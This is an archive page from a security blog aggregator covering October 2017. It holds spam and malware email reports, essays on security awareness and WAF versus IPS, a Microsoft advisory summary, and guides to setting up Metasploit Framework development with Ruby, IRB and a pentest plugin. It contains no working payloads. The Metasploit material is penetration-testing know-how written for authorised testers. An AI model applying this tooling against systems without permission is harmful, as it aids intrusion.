Monthly Archives: October 2017

Bogus porn blackmail attempt from

This blackmail attempt is completely bogus, sent from a server belonging to the domain.

From: Hannah Taylor []
Reply-To:
To: contact@victimdomail.tld
Date: 31 October 2017 at 15:06
Subject: ✓ Tiскеt ID: DMS-883-97867 [contact@victimdomail.tld] 31/10/2017 03:35:54

Maybe this will change your life

Signed

Design For Behavior, Not Awareness

October was National Cybersecurity Awareness Month. Since today is the last day, I figured now is as good a time as any to take a contrarian perspective on what undoubtedly many organizations just did over the past few weeks; namely, wasted a lot of time, money, and good will.

Most security awareness programs and practices are horrible BS. This extends out to include many practices heavily promoted by the likes of SANS, as well as the current state of "best" (aka, failing miserably) practices. We shouldn't, however, be surprised that it's all a bunch of nonsense. After all, awareness budgets are tiny, the people running these programs tend to be poorly trained and uneducated, and in general there's a ton of misunderstanding about the point of these programs (besides checking boxes).

To me, there are three kinds of security awareness and education objectives:
1) Communicating new practices
2) Addressing bad practices
3) Modifying behavior

The first two areas really have little to do with behavior change so much as they're about communication. The only place where behavior design comes into play is when the secure choice isn't the easy choice, and thus you have to build a different engagement model. Only the third objective is primarily focused on true behavior change.

Awareness as Communication

The vast majority of so-called "security awareness" practices are merely focused on communication. They tell people "do this" or "do that" or, when done particularly poorly, "you're doing X wrong idiots!" The problem is that, while communication is important and necessary, rarely are these projects approached from a behavior design perspective, which means nobody is thinking about effectiveness, let alone how to measure for effectiveness.

Take, for example, communicating updated policies. Maybe your organization has decided to revise its password policy yet again (woe be to you!). You can undertake a communication campaign to let people know that the new policy goes into effect on a given date, and maybe even explain why the policy is changing. But that's about it. You're telling people something theoretically relevant to their jobs, but not much more. This task could be done just as easily by your HR or internal communications team as by anyone else. What value is being added?

Moreover, the best part of this is that you're not trying to change a behavior, because your "awareness" practice doesn't have any bearing on it; technical controls do! The password policy is implemented in IAM configurations and enforced through technical controls. There's no need for cognition by personnel beyond "oh, yeah, I now have to construct my password according to new rules." It's not like you're generally giving people the chance to opt out of the new policy, and there's no real decision for them to make. As such, the entire point of your "awareness" is communicating information, but without any requirement for people to make better choices.
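As a concrete sketch of what "enforced through technical controls" means here, consider a minimal Ruby validator. The specific rules below are invented for illustration; in practice the policy lives in your IAM configuration, not application code, and the user makes no choice beyond constructing a compliant password.

```ruby
# A minimal sketch of a password policy enforced as a technical control.
# These rules are made up for illustration only.
def password_conforms?(pw)
  pw.length >= 12 &&
    pw.match?(/[A-Z]/) &&   # at least one uppercase letter
    pw.match?(/[a-z]/) &&   # at least one lowercase letter
    pw.match?(/\d/)         # at least one digit
end

password_conforms?('CorrectHorse9battery')  # => true
password_conforms?('short1A')               # => false
```

The control either accepts or rejects the input; no awareness campaign changes that outcome.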

Awareness as Behavior Design

The real role of a security awareness and education program should be on designing for behavior change, then measuring the effectiveness of those behavior change initiatives. The most rudimentary example of this is the anti-phishing program. Unfortunately, anti-phishing programs also tend to be horrible examples because they're implemented completely wrong (e.g., failure to benchmark, failure to actually design for behavior change, failure to get desired positive results). Yes, behavior change is what we want, but we need to be judicious about what behaviors we're targeting and how we're to get there.

I've had a strong interest in security awareness throughout my career, including having built and delivered awareness training and education programs in numerous prior roles. However, it's only been the last few years that I've started to find, understand, and appreciate the underlying science and psychology that needs to be brought to bear on the topic. Most recently, I completed BJ Fogg's Boot Camp on behavior design, and that's the lens through which I now view most of these flaccid, ineffective, and frankly incompetent "awareness" programs. It's also what's led me to redefine "security awareness" as "behavioral infosec" in order to highlight the importance of applying better thinking and practices to the space.

Leveraging Fogg's models and methods, we learn that Behavior happens when three things come together: Motivation, Ability, and a Trigger (aka a prompt or cue). When designing for behavior change, we must then look at these three attributes together and figure out how to specifically address Motivation and Ability when applying/instigating a trigger. For example, if we need people to start following a better, preferred process that will help reduce risk to the organization, we must find a way to make it easy to do (Ability) or find ways to make them want to follow the new process (Motivation). Thus, when we tell them "follow this new process" (aka Trigger), they'll make the desired choice.
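As a toy illustration (my own simplification, not Fogg's formal model), the interplay can be sketched in Ruby: a behavior only happens when a trigger fires while motivation and ability are jointly above some action threshold. The numeric scales and threshold are invented.

```ruby
# Toy model of Behavior = Motivation + Ability + Trigger.
# Scales (0.0..1.0) and the threshold are illustrative only.
def behavior_occurs?(motivation:, ability:, trigger:, threshold: 0.5)
  return false unless trigger            # no prompt, no behavior
  (motivation * ability) >= threshold    # hard tasks demand more motivation
end

behavior_occurs?(motivation: 0.9, ability: 0.2, trigger: true)   # => false (too hard)
behavior_occurs?(motivation: 0.9, ability: 0.9, trigger: true)   # => true
behavior_occurs?(motivation: 0.9, ability: 0.9, trigger: false)  # => false (never prompted)
```

Note what the model implies: raising Ability (making the secure choice easy) moves the outcome just as surely as raising Motivation, and is usually far cheaper.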

In this regard, technical and administrative controls should be buttressed by behavior design whenever a choice must be made. Sadly, however, this isn't generally how security awareness programs view the space, and thus they just focus on communication (a type of Trigger) without much regard for also addressing Motivation or Ability. In fact, many security programs experience frustration and failure because what they're asking people to do is hard, which means the average person is not able to do what's asked. Put a different way, the secure choice must be the easy choice, otherwise it's unlikely to be followed. Similarly, research has shown time and time again that telling people why a new practice is desirable will greatly increase their willingness to change (aka Motivation). Seat belt awareness programs are a great example of bringing together Motivation (particularly focused on negative outcomes from failure to comply, such as the reality of death or serious injury, as well as fines and penalties), Ability (it's easy to do), and Triggers to achieve a desired behavioral outcome.

Overall, it's imperative that we start applying behavior design thinking and principles to our security programs. Every time you ask someone to do something different, you must think about it in terms of Motivation, Ability, and Trigger, and then evaluate and measure effectiveness. If something isn't working, rather than devolving into a blame game, look at these three attributes and determine whether a different approach is needed. And, btw, this may not necessarily mean making the secure choice easier so much as making the insecure choice more difficult (for example, someone recently noted on Twitter that they simply added a wait() to their code to force deprecation over time).

Change Behavior, Change Org Culture

Another interesting aspect of this discussion on behavior design is this: organizational culture is the aggregate of behaviors and values. That is to say, when we change behaviors, we are in fact changing org culture, too. The reverse, then, is also true. If we find bad aspects of org culture leading to insecure practices, we can trace those back to the respective behaviors, and then start designing for behavior change. In some cases, we may need to break the behaviors into chains of behaviors and tackle things more slowly over time, but looking at the world through this lens can be quite enlightening. Similarly, looking at the values ensconced within org culture also lets us better understand motivations. People generally want to perform their duties, and do a reasonably decent job at it. This is generally how performance is measured, and those duties and performance measures are typically aligned against outcomes and - ultimately - values.

One excellent lesson that DevOps has taught us (there are many) is that we absolutely can change how the org functions... BUT... it does require a shift in org culture, which means changing values and behaviors. These sorts of shifts can be done either top-down or bottom-up, but the reality is that top-down is much easier in many regards, whereas bottom-up requires that greater consensus and momentum be built to achieve a breakthrough.

DevOps itself is cultural in nature and focuses heavily on changing behaviors, ranging from how dev and ops function, to how we communicate and interact, and so on. Shortened feedback loops and creating space for experimentation are both behavioral, which is why so many orgs struggle with how to make them a reality (that is, it's not simply a matter of better tools). Security absolutely should be taking notes and applying lessons learned from the DevOps movement, including investing in understanding behavior design.

To wrap this up, here are three quick take-aways:

1) Reinvent "security awareness" to be "behavioral infosec" toward shifting to a behavior design approach. Behavior design looks at Motivation, Ability, and Triggers in effecting change.

2) Understand the difference between controls (technical and administrative) and behaviors. Resorting to basic communication may be adequate if you're implementing controls that take away choices. However, if a new control requires that the "right" choice be made, you must then apply behavior design to the project, or risk failure.

3) Go cross-functional and start learning lessons from other practice areas like DevOps and even HR. Understand that everything you're promoting must eventually tie back into org culture, whether it be through changes in behavior or values. Make sure you clearly understand what you're trying to accomplish, and then make a very deliberate plan for implementing changes while addressing all appropriate objectives.

Going forward, let's try to make "cybersecurity awareness month" about something more than tired lines and vapid pejoratives. It's time to reinvent this space as "behavioral infosec" toward achieving better, measurable outcomes.

Incremental "Gains" Are Just Slower Losses

Anton Chuvakin and I were having a fun debate a couple weeks ago about whether incremental improvements are worthwhile in infosec, or if it's really necessary to "jump to the next curve" (phrase origin: Guy Kawasaki's "Art of Innovation"; watch his TEDx talk) in order to make meaningful gains in security practices. Anton even went so far as to write about it a little over a week ago (sorry for the delayed response - work travel). As promised, I feel it's important to counter his arguments a bit.

Anton started by asking, "[Can] you really jump to the "next curve" in security, or do you have to travel the entire journey from the old ways to the cutting edge?"

Of course, this is a sucker's question, and it belies a misunderstanding of the whole "jump to the next curve" argument, which was conceived by Kawasaki in relation to innovation but can be applied to strategy in general. Speaking of the notion, Kawasaki says "True innovation happens when a company jumps to the next curve-or better still, invents the next curve, so set your goals high." And this, here, is the point of arguing for organizations not to settle for incremental improvements, but instead to aim higher.

To truly understand this notion in context, let's first think about what would be separate curves in a security practice vertical. Let's take Anton's example of SOCs, SIEM, log mgmt, and threat hunting. To me, the curves might look like this:
- You have no SOC, SIEM, log mgmt
- You start doing some logging, mostly locally
- You start logging to a central location and having a team monitor and manage
- You build or hire a SOC to more efficiently monitor and respond to alerts
- You add in stronger analytics, automation, and threat hunting capabilities

Now, from a security perspective, if you're in one of the first couple stages today (and a lot of companies are!), then a small incremental improvement like moving to central logs might seem like a huge advance, but you'd be completely wrong. Logically, you're not getting much actual risk reduction by simply dumping all your logs to a central place unless you're also adding monitoring, analytics, and response+hunting capabilities at the same time!

In this regard, "jump to the next curve" would likely mean hiring an MSSP to whom you can send all your log data in order to do analytics and proactive threat hunting. Doing so would provide a meaningful leap in security capabilities and would help an organization catch up. Moreover, even if you spent a year making this a reality, it's a year well-spent, whereas a year spent simply enabling logs without sending them to a central repository for meaningful action doesn't really improve your standing at all.

In Closing

In the interest in keeping this shorter than usual, let's just jump to the key takeaways.

1) The point of "jump to the next curve" is to stop trying to "win" through incremental improvements of the old and broken, instead leveraging innovation to make up lost ground by skipping over short-term "gains" that cost you time without actually gaining anything.

2) The farther behind you are, the more important it is to look for curve-jumping opportunities to dig out of technical debt. Go read DevOps literature on how to address technical debt, and realize that with incremental gains, you're at best talking about maintaining your position, not actually catching up. Many organizations are far behind today and cannot afford such an approach.

3) Attacks are continuing to rapidly evolve, which means your resilience relies directly on your agility and ability to make sizable gains in a short period of time. Again, borrowing from DevOps, it's past time to start leveraging automation, cloud services, and agile techniques to reinvent the security program (and, really, organizations overall) to leap out of antiquated, ineffective practices.

4) Anton quipped that "The risks with curve jumping are many: you can jump and miss (wasting resources and time) or you can jump at the wrong curve or you simply have no idea where to jump and where the next curve is." To a degree, yes, this is true. But, in many ways, for organizations that are 5-10 years behind in practices (again, this applies to a LOT of you!), we know exactly where you should go. Even Gartner advice can be useful in this regard! ;) The worst thing you can do is decide not to take an aggressive approach to getting out of technical security debt for fear of choosing the "wrong" path.

5) If you're not sure where the curves are, here's a few suggestions:
- Identity as Perimeter - move toward Zero Trust, heavily leveraging federated identity/IDaaS
- Leverage an MSSP to centrally manage and monitor log data, including analytics and threat hunting
- Automate, automate, automate! You don't need to invest in expensive security automation tools. You can do a lot with general purpose IT automation tools (like Ansible, Chef, Puppet, Jenkins, Travis, etc.). If you think you need a person staring at a dashboard, clicking a button when a color changes, then I'm sorry to tell you that this can and should be automated.
- If your org writes code, then adopt DevOps practices, getting a CI/CD pipeline built, with appsec testing integrated and automated.
- Heavily leverage cloud services for everything!
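To make the automation point concrete, here is a hypothetical Ruby sketch of the "button-clicker" job described above. The alert format and the response action are stand-ins, not any real product's API.

```ruby
# Poll-and-respond logic a human would otherwise perform by watching a
# dashboard. The alert fields and the action string are invented.
def triage(alerts)
  alerts.select { |a| a[:severity] >= 7 }          # the "color change"
        .map    { |a| "isolate host #{a[:host]}" } # the "button click"
end

alerts = [
  { host: 'web01', severity: 9 },
  { host: 'db01',  severity: 3 }
]
triage(alerts)  # => ["isolate host web01"]
```

Anything this mechanical belongs in a scheduled job or pipeline stage, not in a person's workday.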

Good luck, and may the odds be ever in your favor! :)

Open Source Pentesting

My talk today at Wild West Hacking Fest was about some documents that I released here. I'll make this blog post more in-depth later, but for right now I wanted to get the slides out.

(If you can't access one of the documents yet, don't ask for permission; it just means it isn't ready yet. I'll make a post about each one as it becomes available.)

Here is the main slide deck for the docs:

Here are the slides for the release talk (not the same as the link above):

VirusTotal += Cybereason

We welcome the Cybereason scanner to VirusTotal. In the words of the company:

“Cybereason has developed a comprehensive platform to manage risk, including endpoint detection and response (EDR) and next generation antivirus (NGAV). Cybereason’s NGAV solution is underpinned by a proprietary machine learning (ML) anti-malware engine that was built and trained to block advanced attacks such as never-before-seen malware, ransomware, and fileless malware. The cloud-enabled engine conducts both static binary analysis and dynamic behavioral analysis to increase detection of known and unknown threats. Files submitted to VirusTotal will be analyzed by Cybereason’s proprietary ML anti-malware engine and the rendered verdicts will be available to VirusTotal users.”

Cybereason has expressed its commitment to follow the recommendations of AMTSO and, in compliance with our policy, facilitates this review by SE Labs, an AMTSO-member tester.

Switching Ruby Version in RVM for Metasploit Development

If you have set up a development environment with RVM for Metasploit Framework development, you are bound to hit a point where the Metasploit team has changed its preferred Ruby version.

carlos@ubuntu:/opt$ cd metasploit-framework/
ruby-2.4.2 is not installed.
To install do: 'rvm install ruby-2.4.2'

You get a useful message with the RVM command you need to run to install the new version, but there is a bit more to do to fully migrate. Let's start by installing the new version of Ruby with the command RVM suggested when we switched into the folder:

$ rvm install 2.4.2

Now that the new version is installed, let's migrate the gemset. In my case I set the gemset in RVM to the one recommended by the Metasploit dev team, named metasploit-framework. The name tag allows me to copy the gemset from one version of Ruby to the other using the gemset copy command:

$ rvm gemset copy ruby-2.4.1@metasploit-framework ruby-2.4.2@metasploit-framework

Now that the gemset is migrated, I make the new Ruby and gemset the default for my console.

$ rvm --default use ruby-2.4.2@metasploit-framework

I can quickly verify that I have the correct version of Ruby:

$ ruby -v
ruby 2.4.2p198 (2017-09-14 revision 59899) [x86_64-linux]
$ rvm list

rvm rubies

   ruby-2.4.1 [ x86_64 ]
=* ruby-2.4.2 [ x86_64 ]

# => - current
# =* - current && default
#  * - default

I can also check the gemset is the correct one and set as default:

$ rvm gemset list

gemsets for ruby-2.4.2 (found in /home/carlos/.rvm/gems/ruby-2.4.2)
=> metasploit-framework

Once that is done I generate the ri documentation. I find it very useful, especially when I'm traveling or in any other environment without internet access where I cannot do a simple Google search.

$ rvm docs generate-ri

Once done I can test that the documentation was generated by looking at the help information for the Array class and for its each method.

$ ri Array
$ ri Array#each

I hope those of you getting started with coding against Metasploit Framework find this information useful.

Updated 3NT Solutions LLP / / IP ranges

When I was investigating IOCs for the recent outbreak of BadRabbit ransomware I discovered that it downloaded from a domain hosted on This IP belongs to a company called 3NT Solutions LLP that I have blogged about before. It had been three-and-a-half years since I looked at their IP address ranges so I thought I would give them a refresh. My personal recommendation

WAF and IPS. Does your environment need both?

I have been in a fair amount of discussions with management on the need for WAF and IPS; they often confuse the two and their basic purpose. The question usually comes up after a pentest or vulnerability assessment: if I can't fix this vulnerability, shall I just put an IPS or WAF in front of it to block intrusion/exploitation? Or sometimes they are treated as a silver bullet to thwart attackers instead of fixing the bugs. So let me tell you: this is not good!

These security products are well suited to protect from something "unknown" or something you have "unknowingly missed". They are not a silver bullet or an excuse to keep systems/applications unpatched.

Security shouldn't be an either/or case. The more the merrier, as long as each product is configured properly and has a distinct role to play under the flag of defense in depth! So, while I started this article as WAF vs. IPS, it's time to understand it's WAF and IPS. The ecosystem of your production environment is evolving and so is the threat landscape; it's more complex to protect than it was 5 years ago. Attackers are moving at your pace, if not faster and a step ahead. These adversaries also piggyback on existing threats to launch their exploits. Often something that starts as simple as a DDoS to overwhelm your network ends in an application layer attack. So network firewall, application firewall, anti-malware, IPS, SIEM, etc. all have an important task and should be present with bells and whistles!

Nevertheless, whether it's a WAF or an IPS, each has its own purpose, and though they can't replace each other, they have gray areas of overlap under which you can rest your risks. This post will try to address these gray areas and the key differences, to make life easier when it comes to WAF (Web Application Firewall) vs. IPS (Intrusion Prevention System). The assumption is that both are modern products and the IPS has deep packet inspection capabilities. Now let's consider the infrastructure, environment, and scope of your golden eggs before deciding the best way to protect the data:

  1. If you are protecting only "web applications" running on HTTP sockets, then a WAF is enough; an IPS is the cherry on top.
  2. If you are protecting all sorts of traffic - SSH, FTP, HTTP, etc. - then a WAF is of less use, as it can't inspect non-HTTP traffic. I would recommend a deep packet inspection IPS.
  3. A WAF must not be considered an alternative to traditional network firewalls. It works at the application layer and hence is primarily useful for HTTP, SSL (decryption), JavaScript, AJAX, ActiveX, and session management kinds of traffic.
  4. A typical IPS does not decrypt SSL traffic, and is therefore insufficient for packet inspection on HTTPS sessions.
  5. There is a wide difference in traffic visibility and baselining for anomalies. While a WAF has an "understanding" of the traffic (HTTP GET, POST, URLs, SSL, etc.), an IPS only sees network traffic and can therefore do layer 3/4 checks (bandwidth, packet size, raw protocol decoding/anomalies), but not GET/POST or session management.
  6. An IPS is useful where RDP, SSH, or FTP traffic has to be inspected before it reaches the box, to make sure the protocol is not tampered with or wrapped in another TCP packet, etc.

Both technologies have matured and share many gray areas, but understand that a WAF knows and captures the contents of HTTP traffic to see if there is SQL injection, XSS, or cookie manipulation, while an IPS has little or no understanding of the underlying application and therefore can't do much with the traffic contents. An IPS can't raise an alarm if someone is exfiltrating confidential data or sending a harmful parameter to your application; it will let it through as long as it's a valid HTTP packet.
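As a rough illustration of that visibility gap, consider this hypothetical Ruby sketch (not a real WAF or IPS engine): the "WAF" check parses the HTTP layer and inspects a decoded parameter, while the "IPS" check only sees opaque bytes and packet properties.

```ruby
require 'cgi'

# Naive SQL injection signature, for illustration only.
SQLI_PATTERN = /\b(union\s+select|or\s+1=1|drop\s+table)\b/i

# WAF-style check: understands HTTP, so it can decode and inspect parameters.
def waf_flags?(raw_query)
  CGI.parse(raw_query).values.flatten.any? { |v| v.match?(SQLI_PATTERN) }
end

# IPS-style layer 3/4 check: no application context, just packet properties.
def ips_flags?(packet_bytes, max_len: 1500)
  packet_bytes.bytesize > max_len
end

req = "id=1+OR+1%3D1"   # URL-decodes to id=1 OR 1=1
waf_flags?(req)   # => true  (sees the decoded parameter)
ips_flags?(req)   # => false (a small, valid-looking packet passes)
```

The same request sails past the byte-level check precisely because it is well-formed traffic; only the layer that understands the application can judge its content.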

Now, with the information I just shared, try to have a conversation with your management on how to provide the best layered approach in security. How to make sure the network, and application is resilient to complex attacks and threats lurking at your perimeter, or inside.

Be safe.

Malware spam: "Order acknowledgement for BEPO/N1/380006006(2)"

A change to the usual Necurs rubbish: this fake order has a malformed .z archive file which contains a malicious executable with an icon that makes it look like an Office document.

Reply-To: purchase@animalagriculture.org
To: Recipients [DY]
Date: 24 October 2017 at 06:48
Subject: FW: Order acknowledgement for BEPO/N1/380006006(2)

Dear All,

Kindly find the attached Purchase order# IT/

Basics of The Metasploit Framework API – IRB Setup

For those of you who have taken my "Automating Metasploit Framework" class, none of this material will be new. I have decided to start making a large portion of the class available here on the blog as a series.

In this post I will cover the basics of setting up IRB so we can start exploring the Metasploit Framework API in a general sense. The API is extensive and sadly it would take quite a bit of time to cover it all; in this series I will cover the basic API calls and provide enough knowledge so you can continue learning the rest on your own or as needed.

For this you need to be running a development environment. The Metasploit team has documentation on how to set one up.

If you are new to Ruby or come from another language and are learning the syntax here is a Ruby Primer.

What is IRB

IRB is the Interactive Ruby Shell, a REPL (Read -> Eval -> Print Loop) that allows us to interact with the framework in real time, letting us test and validate ideas quickly. One big advantage of the Metasploit Framework is that we can run IRB from inside msfconsole itself. When invoked from inside msfconsole, we are running in the context of the loaded instance of the framework, with access to all of its object instances and libraries.

To test IRB you can just launch msfconsole, run irb, and enter Ruby statements to see the output they generate:

carlos@ubuntu:~$ msfconsole -q
msf > irb
[*] Starting IRB shell...

>> 1 +2
=> 3
>> print_status("hello world")
[*] hello world
=> nil

To exit from irb and go back to msfconsole, one simply needs to type exit:

>> exit
msf > 

IRB Basics

Let's cover some basic usage of IRB before we go into extending it. You may find yourself SSHed into a server, or at its console, where you have not been able to tune IRB to your liking, so knowledge of some basic IRB concepts should be of value. The following are tips I have found useful in helping me understand and explore the ever-changing Metasploit Framework when I work from IRB.

Everything in Ruby is an object, and the type of object dictates what we can do with it. We can look at what type an object is by calling its class method.

>> "This is text".class
=> String
>> 1.class
=> Integer
>> framework.class
=> Msf::Framework
>> framework.db.class
=> Msf::DBManager

As with any object in Ruby, each object has methods and attributes (properties). Every attribute of a Ruby object is accessed and set via methods. We can take a look at the methods available by calling Object.methods:

>> framework.methods
=> [:load_config, :on_module_created, :stats, :cache_thread, :cache_thread=, :cache_initialized, :cache_initialized=, :save_config, :init_simplified, :stats=, :on_module_run, :on_module_complete, :on_module_error, :on_module_load, :init_module_paths, :inspect, :options, :version, :plugins, :post, :search, :modules, :datastore, :nops, :encoders, :payloads, :options=, :modules=, :threads, :sessions, :jobs, :db, :events, :events=, :datastore=, :jobs=, :plugins=, :uuid_db, :uuid_db=, :browser_profiles, :browser_profiles=, :exploits, :auxiliary, :auxmgr, :threads?, :auxmgr=, :db=, :synchronize, :mon_try_enter, :try_mon_enter, :mon_enter, :mon_exit, :mon_synchronize, :new_cond, :`, :to_yaml, :to_yaml_properties, :to_json, :psych_to_yaml, :blank?, :present?, :try, :as_json, :presence, :acts_like?, :to_param, :to_query, :try!, :duplicable?, :to_json_with_active_support_encoder, :to_json_without_active_support_encoder, :instance_values, :instance_variable_names, :html_safe?, :deep_dup, :in?, :presence_in, :with_options, :dclone, :old_send, :encode_length, :decode_sequence, :assert_no_remainder, :decode_octet_string, :decode_integer, :decode_tlv, :encode_integer, :encode_octet_string, :encode_sequence, :encode_tlv, :decode_object_id, :decode_ip_address, :decode_timeticks, :build_integer, :decode_integer_value, :decode_uinteger_value, :decode_object_id_value, :integer_to_octets, :encode_tagged_integer, :encode_null, :encode_exception, :encode_object_id, :unloadable, :require_or_load, :require_dependency, :load_dependency, :pretty_print, :pretty_print_cycle, :pretty_print_instance_variables, :pretty_print_inspect, :instance_of?, :public_send, :instance_variable_get, :instance_variable_set, :instance_variable_defined?, :remove_instance_variable, :private_methods, :kind_of?, :instance_variables, :tap, :method, :public_method, :singleton_method, :class_eval, :is_a?, :extend, :pretty_inspect, :require_with_backports, :define_singleton_method, :to_enum, :enum_for, :select, 
:concern, :<=>, :sleep, :===, :=~, :!~, :suppress_warnings, :eql?, :respond_to?, :freeze, :display, :object_id, :send, :gem, :silence, :silence_warnings, :to_s, :enable_warnings, :with_warnings, :silence_stderr, :silence_stream, :suppress, :capture, :quietly, :nil?, :hash, :class, :singleton_class, :clone, :dup, :itself, :taint, :tainted?, :untaint, :untrust, :trust, :untrusted?, :methods, :protected_methods, :frozen?, :public_methods, :singleton_methods, :!, :==, :!=, :__send__, :equal?, :instance_eval, :instance_exec, :__id__]

We get both the instance methods and the inherited methods of the object. We can search the methods for those whose names match a pattern using the grep(<regex>) method:

>> framework.methods.grep(/module/)
=> [:on_module_created, :on_module_run, :on_module_complete, :on_module_error, :on_module_load, :init_module_paths, :modules, :modules=]

We get a list of the methods, but we are not able to tell what parameters a method takes. To see the number of parameters we can call Object.method(<method>).arity; to look at the parameters themselves we simply change the call to Object.method(<method>).parameters:

>> framework.db.method(:add_workspace).arity
=> 1
>> framework.db.method(:add_workspace).parameters
=> [[:req, :name]]

You may wonder, if we see 1 parameter, why the output shows an array containing a sub-array with 2 values. Each sub-array describes one parameter: the first element is the type and the second is the name. The types are:

  • req - required argument
  • opt - optional argument
  • rest - rest of arguments as array
  • keyreq - required key argument (2.1+)
  • key - key argument
  • keyrest - rest of key arguments as Hash
  • block - block parameter
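To see how each type shows up, we can inspect a throwaway method (not part of Metasploit) that uses every parameter kind:

```ruby
# Each sub-array in Method#parameters is [type, name].
def demo(a, b = 1, *rest, c:, d: 2, **opts, &blk); end

method(:demo).parameters
# => [[:req, :a], [:opt, :b], [:rest, :rest], [:keyreq, :c],
#     [:key, :d], [:keyrest, :opts], [:block, :blk]]
```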

Sometimes we want to look at the source code of the method's definition. We can get a better understanding from the source, and we can also read the comments for even more context on what the method does. We only need to call the source_location method to get the file's full path and the line number:

>> framework.db.method(:add_workspace).source_location
=> ["/opt/metasploit-framework/lib/msf/core/db_manager/workspace.rb", 5]

Configuring IRB

IRB is very useful, but we can make it better by using several Ruby gems and specifying some configuration parameters. There are several gems I use when working in IRB, specifically with the Metasploit Framework. The following are the gems I recommend starting with; with experience you can swap them for others and tweak their settings.

  • Wirble - a very old gem for adding color to the terminal output, among other things. There are newer ports and better gems for this, but I have had bad luck getting them to work inside of MSF. This one, even if old, still gets the job done.
  • awesome_print - prints an object in a format that is visually easier to parse.
  • Code - lets me look at the code of an object or of one of its methods.

Installing these gems is simple with the gem command:

$ gem install awesome_print wirble code

Once installed, I need to allow the Metasploit Framework to load them, since they are not in the project's gemset, and I cannot add them to the project's Gemfile because msfupdate would replace the file. To allow this, in the project folder we need to create a Gemfile.local file that loads the current project gems plus our additional gems.

# Include the Gemfile included with the framework. This is very
# important for picking up new gem dependencies.
msf_gemfile = File.join(File.dirname(__FILE__), 'Gemfile')
if File.readable?(msf_gemfile)
  instance_eval(
end

# Create a custom group
group :local do
  gem 'wirble'
  gem 'awesome_print'
  gem 'code'
  gem 'core_docs'
end

Now we need to create a .irbrc file in our home folder on Linux or Mac OS to load our settings automatically when IRB starts.

# Print message to show that irbrc loaded.
puts '~/.irbrc has been loaded.'

# Load wirble to colorize the console
require 'wirble'
Wirble.init
Wirble.colorize

# Load awesome_print.
require 'ap'

# Load the Code gem
require 'code'

# Remove the annoying irb(main):001:0 prompt and replace with >>
IRB.conf[:PROMPT_MODE] = :SIMPLE

# Tab Completion
require 'irb/completion'

# Automatic Indentation
IRB.conf[:AUTO_INDENT] = true

# Save History between irb sessions
require 'irb/ext/save-history'
IRB.conf[:SAVE_HISTORY] = 100
IRB.conf[:HISTORY_FILE] = "#{ENV['HOME']}/.irb-save-history"

# Get all the methods for an object that aren't basic methods from Object.
class Object
  def local_methods
    (methods - Object.instance_methods).sort
  end
end

Once Wirble is loaded and initialized, the console output uses different colors for different elements, making it easier to read.


With awesome_print I get an even better view of an object, and the output is colorized.


I set up IRB so it will indent and allow for tab completion. Do be careful: MSF is such a big project that tab completion may hang on some things, and you may have to press Ctrl-C to stop it. I also have a function that shows me only the local methods, so the list I have to go through is much shorter once all the inherited methods are removed.

>> framework.db.methods.count
=> 397
>> framework.db.local_methods.count
=> 261

The code gem allows me to look at the code of a method of a given object in order to better understand it.


I hope you have found this information useful. In the next series of posts I will cover general APIs that should be of value when writing modules, plugins, or automating the framework.

Unsupervised Machine Learning in Cyber Security

After my latest blog post on “Machine Learning and AI – What’s the Scoop for Security Monitoring?“, there was a quick discussion on Twitter, and Shomiron made a good point that in my post I solely focused on supervised machine learning.

In simple terms, as mentioned in the previous blog post, supervised machine learning is about learning with a training data set. In contrast, unsupervised machine learning is about finding or describing hidden structures in data. If you have heard of clustering algorithms, they are one of the main groups of algorithms in unsupervised machine learning (the other being association rule learning).

There are some quite technical problems with applying clustering to cyber security data. I won’t go into details for now. The problems are related to defining distance functions and the fact that most, if not all, clustering algorithms have been built around numerical and not categorical data. Turns out, in cyber security, we mostly deal with categorical data (urls, usernames, IPs, ports, etc.). But outside of these mathematical problems, there are other problems you face with clustering algorithms. Have a look at this visualization of clusters that I created from some network traffic:

Unsupervised machine learning on network traffic

Some of the network traffic clusters incredibly well. But now what? What does this all show us? You can basically do two things with this:

  1. You can try to identify what each of these clusters represents. But explainability of clusters is not built into clustering algorithms! You don’t know why something shows up on the top right, do you? You have to somehow figure out what this traffic is. You could run some automatic feature extraction or figure out what the common features are, but that’s generally not very easy. It’s not like email traffic will nicely cluster on the top right and Web traffic on the bottom right.
  2. You may use this snapshot as a baseline. In fact, in the graph you see individual machines. They cluster based on their similarity of network traffic seen (with given distance functions!). If you re-run the same algorithm at a later point in time, you could try to see which machines still cluster together and which ones do not. Sort of using multiple cluster snapshots as anomaly detectors. But note also that these visualizations are generally not ‘stable’. What was on top right might end up on the bottom left when you run the algorithm again. Not making your analysis any easier.

If you are trying to implement case number one above, you can make it a little less generic by injecting some a priori knowledge about what you are looking for. For example, BotMiner and BotHunter use this kind of approach to separate botnet traffic from regular activity.

These are some of my thoughts on unsupervised machine learning in security. What are your use-cases for unsupervised machine learning in security?

PS: If you are doing work on clustering, have a look at t-SNE. It’s a dimensionality reduction algorithm that projects high-dimensional data into two-dimensional space, where clusters become visible. I have gotten incredible results with it. I’d love to hear from you if you have used the algorithm.

MS14-085 – Important: Vulnerability in Microsoft Graphics Component Could Allow Information Disclosure (3013126) – Version: 1.1

Severity Rating: Important
Revision Note: V1.1 (October 19, 2017): Corrected a typo in the CVE description.
Summary: This security update resolves a publicly disclosed vulnerability in Microsoft Windows. The vulnerability could allow information disclosure if a user browses to a website containing specially crafted JPEG content. An attacker could use this information disclosure vulnerability to gain information about the system that could then be combined with other attacks to compromise the system. The information disclosure vulnerability by itself does not allow arbitrary code execution. However, an attacker could use this information disclosure vulnerability in conjunction with another vulnerability to bypass security features such as Address Space Layout Randomization (ASLR).

Update to Pentest Metasploit Plugin

I recently updated my Metasploit Pentest Plugin. I added 2 new commands to the plugin and fixed issues when printing information as a table. The updates are small ones.

Let's take a look at the changes to the plugin. We can start by loading the plugin in a Metasploit Framework session.

msf > load pentest 

       ___         _          _     ___ _           _
      | _ \___ _ _| |_ ___ __| |_  | _ \ |_  _ __ _(_)_ _
      |  _/ -_) ' \  _/ -_|_-<  _| |  _/ | || / _` | | ' \ 
      |_| \___|_||_\__\___/__/\__| |_| |_|\_,_\__, |_|_||_|
Version 1.5
Pentest plugin loaded.
by Carlos Perez (carlos_perez[at]
[*] Successfully loaded plugin: pentest
msf > 

The first update is a command to get a list of IP addresses that can be used for LHOST.

msf > get_lhost 
[*] Local host IP addresses:

The code is very simple. It gets a list of IP addresses from the interfaces on the host and filters out the IPv4 and IPv6 loopback addresses and the IPv6 link-local addresses.

    def cmd_get_lhost(*args)

      opts =
        "-h" => [false, "Command help."]

      opts.parse(args) do |opt, idx, val|
        case opt
        when "-h"
